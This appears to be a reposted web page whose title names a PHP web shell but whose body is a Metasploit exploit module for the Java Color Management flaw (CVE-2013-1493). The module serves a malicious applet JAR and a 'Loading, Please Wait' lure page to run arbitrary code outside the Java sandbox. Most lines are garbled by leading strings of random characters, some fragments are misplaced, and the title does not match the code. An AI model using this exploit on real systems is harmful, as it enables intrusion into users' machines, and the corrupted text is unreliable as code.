STUNSHELL PHP Web Shell远程执行代码

admin

##
2 _, T  w6 a' }  r2 q+ I
# This file is part of the Metasploit Framework and may be subject to
' j) R8 ?# Z" y; o3 g# redistribution and commercial restrictions. Please see the Metasploit
3 M5 j  I& O) }# T$ K' R# web site for more information on licensing and terms of use.
- d% S" ]; t7 P0 Q( P# http://metasploit.com/
##
require ‘msf/core’
require ‘rex’
class Metasploit3 < Msf::Exploit::Remote
1 ?3 N6 Z9 k1 l4 e2 m0 pRank = NormalRanking
& A2 m; F8 S* X. Uinclude Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
8 f7 g/ }, @2 F1 D" osuper( update_info( info,
‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
This module abuses the Color Management classes from a Java Applet to run
1 ]' N( b1 F* d, q* Tarbitrary Java code outside of the sandbox as exploited in the wild in February
/ f' W& Z5 G7 N( J- ^/ I1 n  tand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
6 h! L% e) h8 Land earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
" I) K3 `3 y$ B$ S9 J( Msystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
6 m+ h' g* V( W# K& }  dwarning in order to run the malicious applet.
},
5 A6 q9 G1 `0 i& f3 @‘License’ => MSF_LICENSE,
# t! w4 T2 |6 s' _* \0 o‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
0 S! z% a/ o+ U' ~/ Y! k; T‘References’ =>
[
5 v. |5 d6 v& p4 K[ 'CVE', '2013-1493' ],
8 O. Q: ]0 E0 O7 e: A; v[ 'OSVDB', '90737' ],
: [2 F& q3 C  C! Y! C7 y[ 'BID', '58238' ],
/ w: R% `( k7 i% c5 k* P+ b7 Q[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
8 J7 O/ C& `8 f# y[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
4 i$ Z& \# e( {0 B! C[ 'URL', 'http://pastie.org/pastes/6581034' ]
  r+ [. g9 m5 ^1 U. r+ R, C],
‘Platform’ => [ 'win', 'java' ],
( E9 e- H+ s" C8 u- `7 o/ N‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
‘Targets’ =>
[
[ 'Generic (Java Payload)',
{
% _1 |6 p1 D4 @'Platform' => 'java',
1 [6 F1 [8 O8 _! X) ^2 f'Arch' => ARCH_JAVA
8 `4 |. ^: L% r. u* f}
- d* p. A" G& P( k: |],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
+ y/ o3 @- b3 S" R7 J' I2 s6 A]
; l+ i) K. G) E9 F0 w) X" b],
‘‘DisclosureDate’ => ‘Mar 01 2013′
))
end
def setup
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
7 [' Z3 G; u+ }) Z5 b! Ypath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
  A8 ~" \% _4 l% [path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
9 N$ j: @$ Y% Q0 p6 Q- t@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
4 o1 ^; D4 d6 l@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
( [) z  c  k5 Y# ^' S5 }/ y6 J@init_class.gsub!(“Init”, @init_class_name)
super
6 Y, c4 |8 Y* ]  ]3 u( T+ kend
def on_request_uri(cli, request)
/ j" O/ u' _7 N7 n9 H/ e: v0 Z. Dprint_status(“handling request for #{request.uri}”)
) R) f2 l7 j  ^( \. P8 Bcase request.uri
when /\.jar$/i
+ t! n, s1 }* S# G8 G9 Qjar = payload.encoded_jar
+ S7 F& c' M4 O" gjar.add_file(“#{@init_class_name}.class”, @init_class)
jar.add_file(“Leak.class”, @leak_class)
6 J0 ]# @/ C! B  M1 hjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
5 t6 R$ _4 Z8 y& S- J- [  kDefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
; [- Y6 y1 s  |3 f# Y& N9 K9 d. zpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
9 x# W! X8 N* ]- a/ o- p* u% |) b  Pentry.name.gsub!(“metasploit”, metasploit_str)
# R9 l. R0 c4 y9 n# ^; ]9 {entry.name.gsub!(“Payload”, payload_str)
  }, f4 F  K  t$ y6 m( Sentry.data = entry.data.gsub(“metasploit”, metasploit_str)
3 G% V& X, v* b0 ^& q1 E# kentry.data = entry.data.gsub(“Payload”, payload_str)
}
. `% \0 E3 s" P+ w& {jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
$ O3 p1 T' G7 h2 x! J, }6 _when /\/$/
$ {2 a+ x; \( F$ S5 u3 ^) kpayload = regenerate_payload(cli)
& F% V# f+ Y0 w1 b; a8 pif not payload
$ `5 i" {5 b* Kprint_error(“Failed to generate the payload.”)
% }5 g2 ?5 \: U: ?send_not_found(cli)
1 I) x8 m, X, ], `* B; w( dreturn
end
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
. R- \, m6 L9 y+ `/ l1 w0 X2 n- wsend_redirect(cli, get_resource() + ‘/’, ”)
) x7 I. H; b& C. send
end
8 G( `' R% e& qdef generate_html
: j, C$ P. k$ }3 |* }+ rhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
! a  U7 ?( E2 ]2 a1 n+ zhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
. w2 w) S' w5 o5 U- X  j  h7 Khtml += %Q|</applet></body></html>|
8 n; r: Z0 w$ T2 G9 ]$ Ureturn html
6 @$ x. h, O7 jend
end
1 e# k' I2 q+ send